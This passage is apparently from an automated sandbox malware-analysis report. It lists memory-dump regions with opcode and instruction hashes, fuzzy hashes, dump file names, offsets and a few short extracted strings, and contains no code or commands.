                                                                                                                                  • Opcode Fuzzy Hash: 8d45803a29edb7ddd850971e732357149f038aa5034c1495d94f3505c600245e
                                                                                                                                  • Instruction Fuzzy Hash: 9901DC327012158FC7159E39E04485AB7B6FB962253A605BFE808CB721DB39EC42CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: aae6fcab45362969128299161a725f89289dfb9b6782e3d7018e03e9f2bc3845
                                                                                                                                  • Instruction ID: 723130ca9eaf85789710e06e1a02b05d5e4604cba13f894022ae1197fa9ae2ff
                                                                                                                                  • Opcode Fuzzy Hash: aae6fcab45362969128299161a725f89289dfb9b6782e3d7018e03e9f2bc3845
                                                                                                                                  • Instruction Fuzzy Hash: 7BF0F9312103014FC719AB75A850A6E7B6BFFC1250F048979D4468F5B9DD689E0AC791
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7c871b5678e8ef02f342e042dccd6cf4dcde185d713893fee423bd67e987742b
                                                                                                                                  • Instruction ID: 1ce8dc333c73a077daa8ac6ae16e5da5a3a065eec1ddfefb9bd92ca686373d59
                                                                                                                                  • Opcode Fuzzy Hash: 7c871b5678e8ef02f342e042dccd6cf4dcde185d713893fee423bd67e987742b
                                                                                                                                  • Instruction Fuzzy Hash: 57F090367012258F87159E39E44480AB7EAFBD9225365497EE809CB710DF35EC45CBD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2499887075.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_152d000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e795855f76a5f9025fd41ae5074edb0db61a3da7029a6bd17e4d4d8914cd0643
                                                                                                                                  • Instruction ID: d598f486c5a8fb522446d0c86bbca2a2c6f980796f28a5f985d2644138b45d0a
                                                                                                                                  • Opcode Fuzzy Hash: e795855f76a5f9025fd41ae5074edb0db61a3da7029a6bd17e4d4d8914cd0643
                                                                                                                                  • Instruction Fuzzy Hash: C2F0C2721043549EE7108A0AC984B66FFA8EF82724F18C45AFD484E2C6C3799840CA74
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ece51db285c38c58c1b01d263f7f2ef4cdf53f283c811edb0187f851e2072d89
                                                                                                                                  • Instruction ID: c8b3ee18ee33e99285b80ed9b530c385c182422bff396c4839ac4d540baefeec
                                                                                                                                  • Opcode Fuzzy Hash: ece51db285c38c58c1b01d263f7f2ef4cdf53f283c811edb0187f851e2072d89
                                                                                                                                  • Instruction Fuzzy Hash: EEF096312003021BC718AA25A850A6E765FFFC0250F048938D5068F1A8DD68DE0A8795
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3d2ca44fe432da8ad4096f1791be49ac3887500e133c3180b4f2b1c95456b29d
                                                                                                                                  • Instruction ID: 162a8f1669d288fd6225e0dac48374d3e77d21b3eef70de20080e252a3c787ff
                                                                                                                                  • Opcode Fuzzy Hash: 3d2ca44fe432da8ad4096f1791be49ac3887500e133c3180b4f2b1c95456b29d
                                                                                                                                  • Instruction Fuzzy Hash: EFF062329102499BDF15DB74C4195EFFBF6AF84340F04856AD412EB281DE74190ACB92
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: df3bb9fdf7478bb294802df6fed2a95ada41c59c3b328477f42dae223fb9a0ee
                                                                                                                                  • Instruction ID: ff97ed5af538a899a90557bc838d49dd6b901af7e03a5e6f7a029e0aba9e7471
                                                                                                                                  • Opcode Fuzzy Hash: df3bb9fdf7478bb294802df6fed2a95ada41c59c3b328477f42dae223fb9a0ee
                                                                                                                                  • Instruction Fuzzy Hash: F5F058327442118FC7699A78A41086A77F6AFCB22032501BED009CB361CA359C46CB62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3c940b9c25f08cd1f0cda407a5260fffe8c0109bfb18e62d6596c7208fffd011
                                                                                                                                  • Instruction ID: 15e6eccee12667828c8bb517179361887c67008c5b187e883bcf2c3be8271d10
                                                                                                                                  • Opcode Fuzzy Hash: 3c940b9c25f08cd1f0cda407a5260fffe8c0109bfb18e62d6596c7208fffd011
                                                                                                                                  • Instruction Fuzzy Hash: 84F0BE36B002128BC716AB6DB95469E3BAAFFD5210B10853AD445DB604EE3CE8468BC0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f99fa6618b82adfa944d795526cace909a5468d15a89ace8427cc775af8a53d4
                                                                                                                                  • Instruction ID: d9597bac70c9c6fa8fa8436e015674020c1d83449080cba3fc176d22a5114a35
                                                                                                                                  • Opcode Fuzzy Hash: f99fa6618b82adfa944d795526cace909a5468d15a89ace8427cc775af8a53d4
                                                                                                                                  • Instruction Fuzzy Hash: 74F027327487514FC7356B38A85046B7BE6BFCA22531005BED04ACF352CD359C06C7A6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ec6cd005ba8c2364e3156cf9f46c070cc545a4b7f344cf47a60cc8388d886caa
                                                                                                                                  • Instruction ID: c13cbc5035ae5b8ebebd801399da932d3d09c42ece154e2ca79dbd601a16eb21
                                                                                                                                  • Opcode Fuzzy Hash: ec6cd005ba8c2364e3156cf9f46c070cc545a4b7f344cf47a60cc8388d886caa
                                                                                                                                  • Instruction Fuzzy Hash: 86F08932D1014997DF15D764C4155EFFBB6AF48340F05852A9416AB280DE74590687C2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2507671945.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c55d95f3239c513846250368e987406d9014158cd399c8fd4ca74c08d7fc4a85
                                                                                                                                  • Instruction ID: c50f69cfb8eacfe93a79c49acaef3a6e37ec44861bd9d5f9d7d215e0cb316489
                                                                                                                                  • Opcode Fuzzy Hash: c55d95f3239c513846250368e987406d9014158cd399c8fd4ca74c08d7fc4a85
                                                                                                                                  • Instruction Fuzzy Hash: B4F0F0B1519382CFD7224F71D8187EA7F34BF02304F56449BD050EB192CBB84585CB62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fcab5348f799cc13fe93b2861980ab17dc0e6a37a90f3b49e0f0308276f13a56
                                                                                                                                  • Instruction ID: 9581d8a156011c2f2a01830e3950602a3dc6a77c69ad76e7a82631ac2779a91e
                                                                                                                                  • Opcode Fuzzy Hash: fcab5348f799cc13fe93b2861980ab17dc0e6a37a90f3b49e0f0308276f13a56
                                                                                                                                  • Instruction Fuzzy Hash: BEE06D3A7002114BC716AB6EB95499E3BEEFFD5660300853AD50ADB708EF78EC058BD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 711631a070115f8e32013b5fbf6fdefb32585365a737b77aaa498fb4e617c57b
                                                                                                                                  • Instruction ID: 8f0196a43fc138fa4c32d83f14e42ca3f0cddf87eb01a229d23b2ecbd09d22b5
                                                                                                                                  • Opcode Fuzzy Hash: 711631a070115f8e32013b5fbf6fdefb32585365a737b77aaa498fb4e617c57b
                                                                                                                                  • Instruction Fuzzy Hash: E5E09A323006264B87286A3AA81041BB3EBFBDE565310083DD10ACB340CE76AC06C7E6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bc4ff87cdf4b88af532662e845cfa8ab08b70d7d39b99d1d28bf0416ee6dcae0
                                                                                                                                  • Instruction ID: cb3dbc8d1e7a738acf856b3dc5c4af9f2baec5796c7a44e9ce71c5364bd06a5d
                                                                                                                                  • Opcode Fuzzy Hash: bc4ff87cdf4b88af532662e845cfa8ab08b70d7d39b99d1d28bf0416ee6dcae0
                                                                                                                                  • Instruction Fuzzy Hash: B1E04F327002158F8B29AB39E05081A73EAAFDA66531501BDD409CF360CE31EC42C7A2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3d49f03fbd0f8a37da1229d6b5eed31a0534b11624bc66062f228e1c5b30f4e6
                                                                                                                                  • Instruction ID: 6ba411482acd9dbebc942e8d5b3b91f4617f297ac25666a5a985a917a6afc1e7
                                                                                                                                  • Opcode Fuzzy Hash: 3d49f03fbd0f8a37da1229d6b5eed31a0534b11624bc66062f228e1c5b30f4e6
                                                                                                                                  • Instruction Fuzzy Hash: FEE0927150524DAFC702DBB9B9055997BB8EF42100B5046DAD404DB652D6381E148BA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f9b0babac570704fb972ffe89fc27f10c8f6b7b3e5a1c9608016f4727ed48bf0
                                                                                                                                  • Instruction ID: ec4f10b93a6601fbfe6c2247d978c65861138b2e78291d7e6a003ffcc4d9e223
                                                                                                                                  • Opcode Fuzzy Hash: f9b0babac570704fb972ffe89fc27f10c8f6b7b3e5a1c9608016f4727ed48bf0
                                                                                                                                  • Instruction Fuzzy Hash: 98E09231A482869FC701DF78E8D162CBBB2FFA720031886DAC048DF252CA352900DB61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d944b777a18aa84d086d67baa305415f78fe919ee16c4354f181d3bbb5ff0cbd
                                                                                                                                  • Instruction ID: da1b391ee8aae9cc1604e23d1fd787187eec2e5e00f1ed7973e712104768cc65
                                                                                                                                  • Opcode Fuzzy Hash: d944b777a18aa84d086d67baa305415f78fe919ee16c4354f181d3bbb5ff0cbd
                                                                                                                                  • Instruction Fuzzy Hash: FFD0C231A40208FFC700DFB4D80465D77F6FB88200B414498D415DB380DB351E00A700
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6499c533e11cb4908dc2d987b4f644a01cd65b443f3d90e17c899e5489697cd8
                                                                                                                                  • Instruction ID: e3d8f8d9f659f5664b933d22aaa16e76638c25f4fc5263a683bb7b9713c3fa8f
                                                                                                                                  • Opcode Fuzzy Hash: 6499c533e11cb4908dc2d987b4f644a01cd65b443f3d90e17c899e5489697cd8
                                                                                                                                  • Instruction Fuzzy Hash: 42D05B71E4060EBB8B44EBB4895166D73E6FBD51007508499C409DB350DE751E005755
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6a7cade75ea26c595c71ad80f97ffc90e8f6841963f16ee76e94b0bf7b400297
                                                                                                                                  • Instruction ID: d40a13ccb5e3714ea57cfa96c04cb2a0fc6fb465b07fffec270e42b1e1c37318
                                                                                                                                  • Opcode Fuzzy Hash: 6a7cade75ea26c595c71ad80f97ffc90e8f6841963f16ee76e94b0bf7b400297
                                                                                                                                  • Instruction Fuzzy Hash: F8D017B1A0120DEFCB40EFA9FA0699DB7F9EB45200B5046A8D409D7651EA796E109B90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 361720037fd957c7602387f0a07399254f051466e89ea8d4a539c890ec0700ca
                                                                                                                                  • Instruction ID: f46b0e863bdbcbf3fd3b75d1d068b01bfce5a5b27f21b17beb9cf1ba41f5ac71
                                                                                                                                  • Opcode Fuzzy Hash: 361720037fd957c7602387f0a07399254f051466e89ea8d4a539c890ec0700ca
                                                                                                                                  • Instruction Fuzzy Hash: 23E017302842408FC781CB34E4948897BB0AF8A22832581EAE44CCB222D32B9C47CB10
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f48f0d6020eaf58e8707acf1498a10dbd916362a67e8082914c52d0340b46303
                                                                                                                                  • Instruction ID: 5745cd8bf3a535c0c04362a0cafc9e9bf2e84e109295f7658afb58196564d457
                                                                                                                                  • Opcode Fuzzy Hash: f48f0d6020eaf58e8707acf1498a10dbd916362a67e8082914c52d0340b46303
                                                                                                                                  • Instruction Fuzzy Hash: 48C002353502088F8740DB68D484815B3F9AB8D6283248199E94D8B322D632FC028A40
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: .C8$Haq$;]q
                                                                                                                                  • API String ID: 0-3765014813
                                                                                                                                  • Opcode ID: cf4d619fb04f8aa2078727b9e9b3b358045d54e0591290e7195f388f50fc57cd
                                                                                                                                  • Instruction ID: 90d0705afef80e0e2d8c01092b75649a1d25000535609d2f86bba1ba8c6c1823
                                                                                                                                  • Opcode Fuzzy Hash: cf4d619fb04f8aa2078727b9e9b3b358045d54e0591290e7195f388f50fc57cd
                                                                                                                                  • Instruction Fuzzy Hash: 92811572F002258FCB18DAADD85456EB7F2BBC921075A81AADC09EB351DA74CC01D7D1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: oko
                                                                                                                                  • API String ID: 0-869286862
                                                                                                                                  • Opcode ID: 7b03c0b516c732e56aa7535182cdc93134e421430e5a25aaec6de015c7f23684
                                                                                                                                  • Instruction ID: f9a3f2b02f5b90a7da25aaafe1f21e9e3cfa54c8a1699f6ae9f4cdfa347254cd
                                                                                                                                  • Opcode Fuzzy Hash: 7b03c0b516c732e56aa7535182cdc93134e421430e5a25aaec6de015c7f23684
                                                                                                                                  • Instruction Fuzzy Hash: A3F1D375E1020A9FCF48CFE8D9825EEFBB2BF48314F648129E615BB224D7345995CB90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2507671945.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: \VGl
                                                                                                                                  • API String ID: 0-865257909
                                                                                                                                  • Opcode ID: 051cdb8fecccf4a41b20579461ce2237f1d6e4bf5f338076c01012dbcd992ec6
                                                                                                                                  • Instruction ID: cd0c73f8c39b34e55e5f8fba9b8f146e8aa50aa1005308d564ca32c7af48815c
                                                                                                                                  • Opcode Fuzzy Hash: 051cdb8fecccf4a41b20579461ce2237f1d6e4bf5f338076c01012dbcd992ec6
                                                                                                                                  • Instruction Fuzzy Hash: C2B15FB0E2020ACFDF14CFAACD8579DBBF6AF88308F548529E415A7254EB749851CF91
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2507671945.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: \VGl
                                                                                                                                  • API String ID: 0-865257909
                                                                                                                                  • Opcode ID: cceabce2ed03ef824cd828fc4c36296fede234403fe06d70c4cb08e6958a27e4
                                                                                                                                  • Instruction ID: d2918513c89771245c46e711ff0e62bc2dbb372a41762871a4c0cd524f33e52f
                                                                                                                                  • Opcode Fuzzy Hash: cceabce2ed03ef824cd828fc4c36296fede234403fe06d70c4cb08e6958a27e4
                                                                                                                                  • Instruction Fuzzy Hash: 77916FB0E2020ADFDF14CFAAC9817DDBBF6AF88308F648129D415E7254DB749856CB91
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Haq
                                                                                                                                  • API String ID: 0-725504367
                                                                                                                                  • Opcode ID: e144504fe785ad0557b746a9d45ea64fd94c5db8e9190859d94ec712a9500dbc
                                                                                                                                  • Instruction ID: 99f9cb5348491da1f9ac3a9de9677e7a58fed6995f472b7f6db04dace5cf56b6
                                                                                                                                  • Opcode Fuzzy Hash: e144504fe785ad0557b746a9d45ea64fd94c5db8e9190859d94ec712a9500dbc
                                                                                                                                  • Instruction Fuzzy Hash: EB718236F002168FCB18DFA9D89489EBBF6BF8921471504A9D809EF361DB34DC01CB92
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4aaa3fbb936d2f3c8da0c01c9bcc7e1c952e1a41048414d83982c0d206602523
                                                                                                                                  • Instruction ID: a1b46edbd0e5b2d0366493e8c1ef114f0df10fc6a6fbfe939b1c122bcc8d3504
                                                                                                                                  • Opcode Fuzzy Hash: 4aaa3fbb936d2f3c8da0c01c9bcc7e1c952e1a41048414d83982c0d206602523
                                                                                                                                  • Instruction Fuzzy Hash: 8D023B75E08219CFEB68DFB9C88969DBBB2BF85310F3441ADD405AB252DB349881DF41
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7c881e09d98be042241f068e0c3b3605bb8fe7fc27a5ee0085f99a1398215f97
                                                                                                                                  • Instruction ID: e97ab495db802cf9c6a66cba98af1da80ca11e12c11b51775733281f1ac0b2d0
                                                                                                                                  • Opcode Fuzzy Hash: 7c881e09d98be042241f068e0c3b3605bb8fe7fc27a5ee0085f99a1398215f97
                                                                                                                                  • Instruction Fuzzy Hash: 22A1C272E002298FCB14DFA9C9845AEBBB2BB88310B16856AD814FF350D774DC45CBE1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2507671945.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 788c47555f971ca3f9be2bfa37ca47150322bf9c371d0a055a1fb8f667edb209
                                                                                                                                  • Instruction ID: 97324b44255510a77369316110be9b1108f43cfb6801cfacfedf4eeef3051aaf
                                                                                                                                  • Opcode Fuzzy Hash: 788c47555f971ca3f9be2bfa37ca47150322bf9c371d0a055a1fb8f667edb209
                                                                                                                                  • Instruction Fuzzy Hash: FBB15DB0E2021ACFDF10CFA9C98179DBBF6FF89318F548529D414AB294EB749855CB81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1bd10e23b42ae7cfa717cab5b8b0498fe86b9fd509a11c06d7f3b3a0108d1bc2
                                                                                                                                  • Instruction ID: 6e7a6d572a603ec581bae933cad6aef6ac022738c7c22ba09b5ff1e54ce29566
                                                                                                                                  • Opcode Fuzzy Hash: 1bd10e23b42ae7cfa717cab5b8b0498fe86b9fd509a11c06d7f3b3a0108d1bc2
                                                                                                                                  • Instruction Fuzzy Hash: 0C91B433F106394B9B14DEA9C8815AEF7F2BB9825075A892AEC06FB354D674DC01CBD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2500228720.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1590000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e4efd80550cf300f41493848e39fb22aa297d95c60a730c52c239192bc6ed569
                                                                                                                                  • Instruction ID: 5146a9c0f10d8f2b2169e5b842ef491a0165085ec2ba64f2dacad4cff300b739
                                                                                                                                  • Opcode Fuzzy Hash: e4efd80550cf300f41493848e39fb22aa297d95c60a730c52c239192bc6ed569
                                                                                                                                  • Instruction Fuzzy Hash: B191C872F002298FEF24CEADD480A9DBBF6BB84350B06816AD815FB354D7749D05CB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2503709736.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5760000_file.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3c9eaf5210f4f20f8c7c6b5c4e8ecb5cc7b0b97ea2cf61c83946a87e4a01cfc2
                                                                                                                                  • Instruction ID: e8bd4cf5813ac0dd0f95aaf6f5aa647ded875e76434e117272182c43180e9a79
                                                                                                                                  • Opcode Fuzzy Hash: 3c9eaf5210f4f20f8c7c6b5c4e8ecb5cc7b0b97ea2cf61c83946a87e4a01cfc2
                                                                                                                                  • Instruction Fuzzy Hash: 40916D36A002268FCB18DF68C94489DB7F2BF8831475645A9DC0AEF365EB35DC46CB91
                                                                                                                                  Memory Dump Source
